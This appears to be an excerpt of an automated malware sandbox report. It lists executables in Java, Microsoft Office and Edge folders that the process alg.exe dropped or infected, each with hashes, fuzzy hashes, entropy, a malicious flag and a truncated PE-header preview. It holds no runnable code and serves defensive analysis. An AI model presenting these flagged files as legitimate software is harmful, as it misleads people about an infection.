SHA-256:	E4AD81B4F0826E957BD86668548A573F735A6B5697DF920C21BE38BB3921D619
SHA-512:	6E138070FFD28A4A2E8D099740CD3AB764E505C96BABA157F349F9DDE192ACC9F02C74620FAA2F1B86C3A7605B78E19E9BA420BA75A867D1D5B5B1273404B705
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................W........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.033866875939195
Encrypted:	false
SSDEEP:	12288:vameXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:yLsqjnhMgeiCl7G0nehbGZpbD
MD5:	DE37C176279E268C44BCF22D54F3534B
SHA1:	D4A18F0EAB09631F13C80743EAFC68F783D7C582
SHA-256:	C7736BF548089EF91AAF99D697291A6790E92AD7F05EC3AA70359B6562BF8887
SHA-512:	254F1897EB8BF8D327F50A59F2DEFDEE504018346DD14AA17EAD82420F31E16CCF09AFC40F38FF84E909D8798971412B579623298B1434278C15EA374BA9DEC1
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................mw......................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032935879352042
Encrypted:	false
SSDEEP:	12288:lQ5qXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:WksqjnhMgeiCl7G0nehbGZpbD
MD5:	14E2F91551EB64562E03A3B0D8093170
SHA1:	861E6864EA3673A107F095B3E00359991AE3DF01
SHA-256:	692E51332CCCA2EA65E309D3DB1D449EA217300AFA5DD805178313F813A8849E
SHA-512:	5FF2D21D265D0464EAEF6A9134BF66090D5A42774A9A786A3BB7E891A7E4CA20E08092CAA8E6C94F04BA83FB49BEDF95E0F7EAC9D67A8F565A3FF4354ECD5191
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032970908479915
Encrypted:	false
SSDEEP:	12288:aV/CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CasqjnhMgeiCl7G0nehbGZpbD
MD5:	66FC7D5C71F045F7EA4690C51DFB66F0
SHA1:	5FF583E522A5142D62B29EA4FAED9D6D77B9D1D4
SHA-256:	3D0669D0584D28F4F45466A4448BD09EC78C5CE6BA5E40066BF91957589E49CC
SHA-512:	B9661FC5D6F010B5AD56653E3FEB1012F5D269C77D03F1E0F56A54DB15B86BA69F34882B2FE11CCC5A2D8507190692540B3CA6A04677128B760341E6F4B4CA94
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................*.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032867793483503
Encrypted:	false
SSDEEP:	12288:WZmyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:unsqjnhMgeiCl7G0nehbGZpbD
MD5:	A035A2FE6C2BE785F66352F49149980A
SHA1:	8100375E606C67D9A9AED5BD76516D6E83493AF8
SHA-256:	26BCD9269C3740F5FB2B92AF6CDF1CB7C6F143EEDA751BFF2640D9127084FE66
SHA-512:	5FCD688FF652EE8357A71951B97BA980A0D2DE062411D89E0C0524D0879473D943EFAC01290D91CF35B5C4395CEDAEC8F7F114D8265A4C101D4676EF4489334C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032925085378454
Encrypted:	false
SSDEEP:	12288:EeSKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FDsqjnhMgeiCl7G0nehbGZpbD
MD5:	744C83D00ABDE2B069637A7A540B32F8
SHA1:	E1EFAF82EB138A297ADADC529CCC140CC56C28B4
SHA-256:	11BF59F418E6D5BE9BEDEBE599C4720481FE12E2C3F5A3F722FB89E734413B0E
SHA-512:	8067CDFF51EF867C62399C8868F4A372BE6AA16ABB976FF5ADF6CF96645D5334058F448A3AF42B6BFB228DA0C3AC1C631CF14FDBB584D1B527F44281C1B1F781
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................4........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032988143512348
Encrypted:	false
SSDEEP:	12288:o5/CXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:IasqjnhMgeiCl7G0nehbGZpbD
MD5:	E6117D0C06EB1EC88BBD6BADA25DE2F6
SHA1:	2F0D46B733B8A608FF8F780FBAC601A1D8D6739A
SHA-256:	6D4F3ED1068F834F5B974D54A77B2A5817EF82455664689AED4F99A4B2B75F0A
SHA-512:	9630B0A5CD4F2882A6EDC81A362E1D5CFD15313B2A8DAEA79352049D3FA38EBD9A752FDA0D8849993048F2BCE5E1731564DDF6A296E0D3AD00E8CEEBC4526E92
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................'........................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1202688
Entropy (8bit):	5.098057501938408
Encrypted:	false
SSDEEP:	12288:n7EXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:n7EsqjnhMgeiCl7G0nehbGZpbD
MD5:	9992BF3935B21F8910313E55834EF6ED
SHA1:	9E26BD63E028448EAB39BBF1915467702644D3D7
SHA-256:	36462E72E73C681F4C2D2FB0A6CCD2524033F2FB9163064045ED1B506EB9A24D
SHA-512:	AD794AB4030FA5481749C5FD07248B76206C18829EDF2B7A0E4D1AEE3A875BE71DC75623F21D585C82CDDB03065072047376B086033321B1F2B319153A65838F
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@.............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142784
Entropy (8bit):	5.032320595948362
Encrypted:	false
SSDEEP:	12288:ZKQuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oFsqjnhMgeiCl7G0nehbGZpbD
MD5:	62C0B799415B8006BD52F5BE6BBB31FC
SHA1:	C2D666DCB9EA28DB0A7B78E5C28DF9F7F4658468
SHA-256:	320A60C99092C54533C7CD12644A896F558BE8C48270B215DCBBA0239BADAF3B
SHA-512:	22D0A26DF7E78FBC6AE5B87161585390DB27F81A8676303295966488324E721CA5642A2AD138E4A1B26EB98822F11E93964ADAC7C88F8DA0A11049D7BE40A1D8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..................................6.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1298944
Entropy (8bit):	5.249100590226528
Encrypted:	false
SSDEEP:	24576:wi7l/3roAosqjnhMgeiCl7G0nehbGZpbD:Tl/roAUDmg27RnWGj
MD5:	1888065716D98F6D931DCE78B6ECB704
SHA1:	CAE9969A2E9627C4E8A23EC4EAA5D861AFACC8A8
SHA-256:	4E0D6F11E08AE068AA3ED45261F2B6606FCCC524D794286248672876C5D248F0
SHA-512:	60DE67523CFBB2396D5DF694F793C2BF698ECF1B5168BEBBA18AED2091E47F053D944C97F9FC58E1B1EAC2A6C88F3A0F560B542A00D1C57AD63FCF7BE922D27D
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1269248
Entropy (8bit):	5.286878226367639
Encrypted:	false
SSDEEP:	12288:G5bfQnyXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GNfQnysqjnhMgeiCl7G0nehbGZpbD
MD5:	30DDCED92F956D29AC3D37E6DDF4CB21
SHA1:	C8BDD03724751CDAF50E51A94FAE14E21D4075EF
SHA-256:	C98CF8255F480CF3E79C63B0A197C3873EB6F3F91E84F245BDD6814E747D029F
SHA-512:	CA33AB66864DF5DFB0CB62778EC767AD81CE4EFDB2413326F786EB9F012F50C135836AF47E6D91B7EF00DF9F86C531D5C86635F06B9EF0559E30E89841B3CC94
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................................................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.3033473285938495
Encrypted:	false
SSDEEP:	12288:DNmt0LDILi21JXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:eLiesqjnhMgeiCl7G0nehbGZpbD
MD5:	34FFB9EB3428B9F112DDC0543B6262FB
SHA1:	91BA52F8A35B34B90811F1E9F339FC351166909F
SHA-256:	8F6964981B5897716A15BB89F1D3117F3147B3FD3A5A925D5B33AD6573CE8B78
SHA-512:	974190308DFBE45A821BF7262F0E0E80F77D6C1C8BED938418E22FAD3C36C9289F2E3553F747DA7697F419EBBED6CBCE60107116045004E5351AF64F58CE01CC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.............................................. ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1287680
Entropy (8bit):	5.303335544215182
Encrypted:	false
SSDEEP:	12288:LNmt0LDILi21JXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:2LiesqjnhMgeiCl7G0nehbGZpbD
MD5:	68DDA5DE9BC4574746E258D06CEF4F31
SHA1:	2B7652507B13438F57067D95843F3F6013DD88C1
SHA-256:	5E7D93F6BC7FAF31AAE13C7424E0F05EA181AC8AF788BA5ABC6E58CB0CCA502C
SHA-512:	8E593268EDEB3E590DD82DF018F6702F4BE3BE8C86F96C4261031FC6E7A0C85986A2025F26BCB4CEE543DEDA4DB22932B90A0D2B2C7CF4413B26AA7DF0F900B8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................k............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1343488
Entropy (8bit):	5.23604073090413
Encrypted:	false
SSDEEP:	12288:ZjuozQMGNUbTKXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDR:BfesqjnhMgeiCl7G0nehbGZpbD
MD5:	8568C2E806F0DAF6D7605890C6169645
SHA1:	1FBD8DD4F014D5F3C6C9E54614EEEB2FB9F4B88C
SHA-256:	9381A43C09DB4CCBC731EA9FF99EA9751F869C42BA68DEBA70DB3E70BD9B508D
SHA-512:	1678F33233239B8347ED36B2811A5A1B75201A3F3832EC3E78560EE604D40B35FD7EF4BB7B3349BFAAD69220C027682C7CA30903DCD371E1D95D3DDF989395FE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@.......................................... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1496064
Entropy (8bit):	5.577928285585659
Encrypted:	false
SSDEEP:	24576:ebUO42i/ELsqjnhMgeiCl7G0nehbGZpbD:eJ/Dmg27RnWGj
MD5:	7F8D5C084AF305C5A1528E1E58B82619
SHA1:	BED1107A6C571AD5B0A703111152D5B104174F36
SHA-256:	E900AC454B23BDF1C1B0BBE29507145A2D225EDACD4FE3AC83200489D447219F
SHA-512:	C336E63615B842EE38F2C9868EF7A3BCC0966973EFAB551A0E4CF9FDC0BE5D871202F332DEBC3DBD1563FDD8D65E2394CE5734B47EAA387560135CC9E63FF56A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...\|...............@....@.......................... ......\|............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	52712960
Entropy (8bit):	7.961838779845351
Encrypted:	false
SSDEEP:	1572864:5LjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:5icZmsR3Lo/cnLe
MD5:	282E75847F51D196CC51C7BB8380441E
SHA1:	92BB92159B9D882397E545AB3F17C9D4BDC4A248
SHA-256:	2BB106924401045E2B7D303C8B9C32A1F157E825FD64B8D817F7D8BEBD898D1F
SHA-512:	1112AED8E7674EFF1866682C0A5EC7000ACCF5398DA6512B7813D1848B3E75BD8A4F24079D6E1F27FB050B3836FB0F96B28C05E147FB2BBD809F5B1C5DC8218C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......LN.../nB./nB./nB.]mC./nB.]kC./nB.TjC./nB.TmC./nB.TkC}/nB.FjC./nB.FkC3/nB.]hC./nB.]jC./nB.]oC?/nB./oBq-nB.TgC./nB.TkC./nB.TnC./nB.T.B./nB.TlC./nBRich./nB........................PE..L...1~............"....!.j(.........p]........(...@...........................$.....M#%..............................l3..t....3.0.....6.X............................./.p...................../.....h./.@.............(......j3.`....................text...jh(......j(................. ..`.rdata........(......n(.............@..@.data...t.... 4.......4.............@....didat..$.....5.......5.............@....rsrc...X.....6.......5.............@..@.reloc... ...........F..............@...................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4993536
Entropy (8bit):	6.811110838648933
Encrypted:	false
SSDEEP:	98304:AlkkCqyDEY7+o3OBvfGVY+40ya8yS+9s/pLaD527BWG:KkkCqaE68eV+0ynE6LaVQBWG
MD5:	94E6E8EA4563BE60FFA814FC88563EAB
SHA1:	69D27D4E23857E7EA0842434AD907E73F0E5CE7F
SHA-256:	C97DBD43920E272F7A2F4C8029D969B8FEFF571C592ADB57F56121C84BB44872
SHA-512:	6B5C22016D626E24CAA79482C6A6DBD393EF90B2D84E4150DC3701FE04CC9C10AF92947012254294F755CA7B2E9014B27654864DCF2AF39264F773DAF32B82EE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........:V@.[8..[8..[8.{);..[8.{)=..[8..!<..[8..!;..[8..!=..[8.\.U..[8.\.E..[8.{)<..[8.{)>..[8.{)9..[8..[9..X8..!=..[8..!1.0^8..!...[8..[...[8..!:..[8.Rich.[8.................PE..L......e..........".... ....Z........%......`+...@..........................pL......L......................................=......p?.............................<.=.8...................P.:..... .+.@.............+......j=......................text............................. ..`.rdata........+....................@..@.data.........=.......=.............@....rsrc........p?......F?.............@..@.reloc........?......R?.............@...................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1657344
Entropy (8bit):	5.63513140211088
Encrypted:	false
SSDEEP:	24576:4E8DMeflpnIOvYUssqjnhMgeiCl7G0nehbGZpbD:4tDD9pnIO6Dmg27RnWGj
MD5:	7AB9293B5DF0CE748D4B82DFABF59C08
SHA1:	4DD99DD6EBBB4416B58183FD8A306E1E51B4C409
SHA-256:	FBE871DFFE4405C0F63AAB8E015213D05691BDE0446C7970BCA56B6F7E434FF3
SHA-512:	81767B99858108DD1F4C2980DFFC45BEA98F3BA36391338DC2124B9C3479C909346A09F50135E6C4013BC34A42E06470071DD93E7A60E8C18313008C7216F8BF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........J......@!.........@.....................................8.... .............................................................X........F......................T.......................(...P...@...........@...`............................text............................... ..`.rdata..8...........................@..@.data...XL....... ...d..............@....pdata...F.......H..................@..@.00cfg..8.... ......................@..@.gxfg....*...0...,..................@..@.retplne.....`...........................tls.........p......................@..._RDATA..\...........................@..@.rsrc...X...........................@..@.reloc...P.......@..................@...................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4364800
Entropy (8bit):	6.748481749203124
Encrypted:	false
SSDEEP:	49152:VB1sstqMHiq8kBfK9a+cOVE/TqEpEepIkRqqUu9wg6KFYso8l8EFDmg27RnWGj:hHzorVmr2ZkRpdJYolTD527BWG
MD5:	42C6C4837223672FF4BB89256F00C50E
SHA1:	A636FEE88E1A8E2A458478CFD9D345B2B0DF022C
SHA-256:	C1C50F36BD18DCE8967D9575438B3AF610BADD62B497D459A0BECA901C0FF3AC
SHA-512:	2E6C6267D4A0C24CA50E3D86625FF5E85BA6BBC99F3C5EBA71039AF342D574A5BA7CC12EFD3CD2087AFF1216FF4C09CA07C781749A6E79EA48E28392D5B91B13
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......'..".......K.........@.............................PD.....W.B... .....................................................P.... 4.......2..Q..................to..8...................`j..(.....'.@...........0.......`........................text...'.'.......'................. ..`.rdata...A....'..B....'.............@..@.data........./......./.............@....pdata...Q....2..R....0.............@..@.00cfg..0....p3......42.............@..@.gxfg....2....3..4...62.............@..@.retplne......3......j2..................tls..........3......l2.............@...LZMADEC.......3......p2............. ..`_RDATA..\.....4.......2.............@..@malloc_h......4.......2............. ..`.rsrc........ 4.......2.............@..@.reloc... ...0;.......9.............@...................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1238528
Entropy (8bit):	5.146945575618437
Encrypted:	false
SSDEEP:	12288:03w1uVdSEjmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:0EyTmsqjnhMgeiCl7G0nehbGZpbD
MD5:	A648965C63685811B43522A853291025
SHA1:	B79032C5D68481320433972D0067BA1EED164021
SHA-256:	2FED2141223149432FE2058C0F827B5F86381C92AA75F94C7477335D7D054336
SHA-512:	FDFF9D54E62A7A8EB5F498A437D15330FED74F6A7A642806B3C97A9DAAC0951F1286EB5A2EEF3A9EBAFEBA5653AA707FAA8E5151C22F6AE3CF6D58E0A2A6D158
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."............................@.............................P............ ..................................................]..(....................................W..T...............................@............`..X............................text............................... ..`.rdata..,...........................@..@.data...0............j..............@....pdata...............v..............@..@.00cfg..8...........................@..@.gxfg...P...........................@..@.retplne................................_RDATA..\...........................@..@.rsrc...............................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2354176
Entropy (8bit):	7.049983699688517
Encrypted:	false
SSDEEP:	49152:9hDdVrQ95RW0YEHyWQXE/09Val0GTDmg27RnWGj:9hHYW+HyWKQD527BWG
MD5:	F691545D151C73AC2F1C8FC3F6553944
SHA1:	3EB8AC057117979951B297233DF24826DD009665
SHA-256:	03EF07AE57C997D5BB045FBFFD9486C362D6237BA28F0A122C0DD40DB1E350D3
SHA-512:	F638F1E896FBA52D6162B134EC50F7C582295885257CF7A4280F50623D07EB294EF750F9FADD7E11ACD75C11779091C9A65E9C9E0A4741DCE050CE0DFE7834A5
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."......2...........b.........@.............................`%......$... .........................................p%......>).......@..................................8.......................(....c..@........... 0..P............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data...4...........................@....pdata..............................@..@.00cfg..0...........................@..@.gxfg............0..................@..@.retplne.................................tls....!...........................@..._RDATA..\.... ......................@..@malloc_h.....0...................... ..`.rsrc........@......................@..@.reloc.......`......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1825280
Entropy (8bit):	7.158493551466153
Encrypted:	false
SSDEEP:	24576:b70E0ZCQZMiU6Rrt9RoctGfmddBsqjnhMgeiCl7G0nehbGZpbD:H0EzQSyRPRoc1pDmg27RnWGj
MD5:	A2CA7F4768212109C8048F734D1E2D7A
SHA1:	93BAB3E5655735790F3E63FD4004FD2D2A4C2CD0
SHA-256:	D363CDA253B467BEB53442A3192E36DF33BAFF74430D98FA6E8D44D040DA426F
SHA-512:	A9A64122A763D129F084E3338AEB896B0A02B57C971FEBCB1C12D39980BDD80E71E7C15AD546D77FAF93946CC2D6AE0E49F1F96E7CA7824B20CE5C449B6BAAC6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e.........."..........v.......k.........@.............................0............ ..........................................u......ly....... ..........,....................d..T...................hc..(.......@...........@... ............................text............................... ..`.rdata.............................@..@.data........@......."..............@....pdata..,...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@..._RDATA..\...........................@..@malloc_h............................ ..`.rsrc........ ......................@..@.reloc.......0......................@...........................................................................................................................................

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe

Download File

